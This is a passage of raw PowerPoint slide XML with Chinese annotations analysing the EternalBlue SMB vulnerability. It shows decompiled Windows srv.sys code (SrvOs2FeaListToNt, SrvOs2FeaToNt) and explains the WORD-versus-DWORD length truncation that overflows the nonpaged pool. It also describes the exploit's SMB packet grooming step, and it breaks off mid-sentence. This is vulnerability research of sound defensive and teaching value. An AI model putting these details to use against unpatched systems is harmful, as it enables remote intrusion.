                        <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>(v6, (v4 + 12) &amp; 0xFFFFFFFC, &amp;v6) &lt; 0 )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return 0;</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v3 += v4 + 5;</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if ( v3 &gt;= v2 )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return v6;</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v1 = a1;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*v1 = v3 - (_WORD)v1;</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  return v6;</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1400" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="lt1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>}</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1400" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="lt1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="69219" marR="69219" marT="34610" marB="34610"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2735663332"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{562DE953-93E4-4118-AFF3-A0FDC0908AE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2703016"/>
            <a:ext cx="5895862" cy="4154984"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>按上面的逻辑如果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>v3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>这个缓存区中全是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>，那么每次循环</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>v3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>向前移动</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>个字节，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>v6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>就会加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>0xC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>（也就是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>12</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>字节）。问题就出现在*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>v1 = v3 - (_WORD)v1;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>a1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的长度是一个四字节，但这里却是个双字节。那么如果长度为三字节以上，且执行到这里时就有可能把的长度改大。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>Eternalblue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>就设长试是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>0x10000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>，最后最后一个分片长度是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>0xA8,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>这时</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>v3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>已经是偏移了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>FF5D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>了。加上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>0xa8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>就超</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>0x10000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>了，所以就会走到了这一句，执行后长度变成了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>0x1FF5D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>比原来大了不少。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="969603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1464757757"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5895862" y="87310"/>
          <a:ext cx="6152799" cy="6896740"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6152799">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4143037793"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="6558214">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="700" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>signed int __</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="700" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>stdcall</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="700" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> SrvOs2FeaListToNt(char *a1, _DWORD *a2, int *a3, _WORD *a4)</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char *v4; // edi@1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int v5; // eax@1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_DWORD *v7; // eax@3</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char *v8; // ebx@9</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char *v9; // esi@9</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signed int v10; // esi@14</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__int16 v11; // [sp+8h] [bp-4h]@1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_DWORD *v12; // [sp+14h] [bp+8h]@11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v11 = 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v4 = a1;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v5 = SrvOs2FeaListSizeToNt(a1);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*a3 = v5;</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!v5 )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*a4 = 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return -1063718657;</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v7 = (_DWORD *)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="700" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>SrvAllocateNonPagedPool</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="700" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>(v5, 21);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*a2 = v7;</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v7 )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v8 = &amp;a1[*(_DWORD *)a1 - 5];</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v9 = a1 + 4;</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a1 + 4 &gt; v8 )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LABEL_13:</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v9 == &amp;v4[*(_DWORD *)v4]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*v7 = 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return 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*a4 = v11 - (_WORD)v4;</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v10 = -1073741823;</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else</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while ( !(*v9 &amp; 0x7F)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v12 = v7;</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v11 = (signed __int16)v9;</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v7 = (_DWORD *)SrvOs2FeaToNt((int)v7, (int)v9);</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v9 += (unsigned __int8)v9[1] + *((_WORD *)v9 + 1) + 5;</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v9 &gt; v8 )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v7 = v12;</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r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="700" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>goto</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="700" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> LABEL_13;</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*a4 = (_WORD)v9 - (_WORD)v4;</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v10 = -1073741811;</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r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="700" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>SrvFreeNonPagedPool</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="700" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>(*a2);</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return v10;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if ( *((_BYTE *)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="700" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>WPP_GLOBAL_Control</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="700" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> + 29) &gt;= 2u &amp;&amp; *((_BYTE *)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="700" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>WPP_GLOBAL_Control</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="700" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> + 32) &amp; 1 &amp;&amp; </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="700" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>KeGetCurrentIrql</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="700" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>() &lt; 2u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r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="700" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>DbgPrint</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="700" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>("SrvOs2FeaListToNt: Unable to allocate %d bytes from nonpaged pool.", *a3, 0);</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r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="700" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>DbgPrint</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="700" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>("\n");</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  return -1073741307;</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="700" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="lt1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="700" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>}</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="7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9" name="矩形 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{562DE953-93E4-4118-AFF3-A0FDC0908AE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2423098"/>
            <a:ext cx="5895862" cy="3785652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>上面的循环中：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>v9 += (unsigned __int8)v9[1] + *((_WORD *)v9 + 1) + 5;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>        if ( v9 &gt; v8 )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>这里虽有判断但长度</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>v8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>已经被上面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SrvOs2FeaListSizeToNt(a1);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>改的很大了，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>v7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>已经到末尾了再执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SrvOs2FeaToNt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>就分溢出了。最后从</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>while ( !(*v9 &amp; 0x7F) )</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>这句退出从而不影响其它内存。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3539078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2558034727"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5895862" y="87310"/>
          <a:ext cx="6152799" cy="6558214"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6152799">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4143037793"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="6558214">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>unsigned int __</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>stdcall</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> SrvOs2FeaToNt(int a1, int a2)</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int v2; // esi@1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_BYTE *v3; // ebx@1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unsigned int result; // eax@1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v2 = a1;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*(_BYTE *)(a1 + 4) = *(_BYTE *)a2;</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*(_BYTE *)(a1 + 5) = *(_BYTE *)(a2 + 1);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*(_WORD *)(a1 + 6) = *(_WORD *)(a2 + 2);</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>memmove</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>((void *)(a1 + 8), (const void *)(a2 + 4), *(_BYTE *)(a2 + 1));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v3 = (_BYTE *)(*(_BYTE *)(a1 + 5) + a1 + 8);</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*v3++ = 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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>memmove</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>(v3, (const void *)(*(_BYTE *)(v2 + 5) + a2 + 5), *(_WORD *)(v2 + 6));</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result = (unsigned int)&amp;v3[*(_WORD *)(a1 + 6) + 3] &amp; 0xFFFFFFFC;</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*(_DWORD *)v2 = ((unsigned int)&amp;v3[*(_WORD *)(v2 + 6) + 3] &amp; 0xFFFFFFFC) - v2;</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return result;</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a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="7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9" name="矩形 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{562DE953-93E4-4118-AFF3-A0FDC0908AE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1907507"/>
            <a:ext cx="5895862" cy="4524315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>Eternalblue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>每一步先建立一系列链接发送长度为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>fff7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SMB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>包，但每个连接只发前</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>0x80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>字节。为研究这个漏洞是怎么利用的，用下面的方法设置了一个断点，发现每次在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>srvnet!SrvNetWskReceiveEvent</a:t>
